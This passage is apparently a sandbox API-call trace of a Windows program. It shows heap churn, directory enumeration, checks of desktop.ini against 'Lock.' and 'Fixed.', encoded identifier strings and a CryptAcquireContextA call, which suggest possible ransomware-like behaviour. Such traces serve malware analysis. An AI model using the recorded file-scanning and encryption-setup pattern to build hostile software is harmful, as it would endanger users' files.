Flags=0x0, Size=0x8) returned 0x2a71a88 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0224.278] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.279] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0224.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0224.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0224.280] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.280] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.280] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0224.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab2c0 [0224.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab368 [0224.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0224.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.281] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.281] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0224.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0224.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.282] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0224.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0224.282] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865268 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38665d0 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74980 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0224.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0224.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0224.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0224.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0224.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0224.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0224.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0224.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.288] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0224.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.288] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0224.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.288] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8cf1b0, dwReserved1=0x418f3e, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1bf8 [0224.288] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0224.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.289] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0224.289] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.289] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0224.289] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.302] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.302] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.302] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.302] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.302] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.302] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0224.302] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0224.303] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0224.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0224.303] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.303] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0224.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0224.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0224.303] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c440) returned 1 [0224.304] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0224.304] CharUpperBuffW (in: 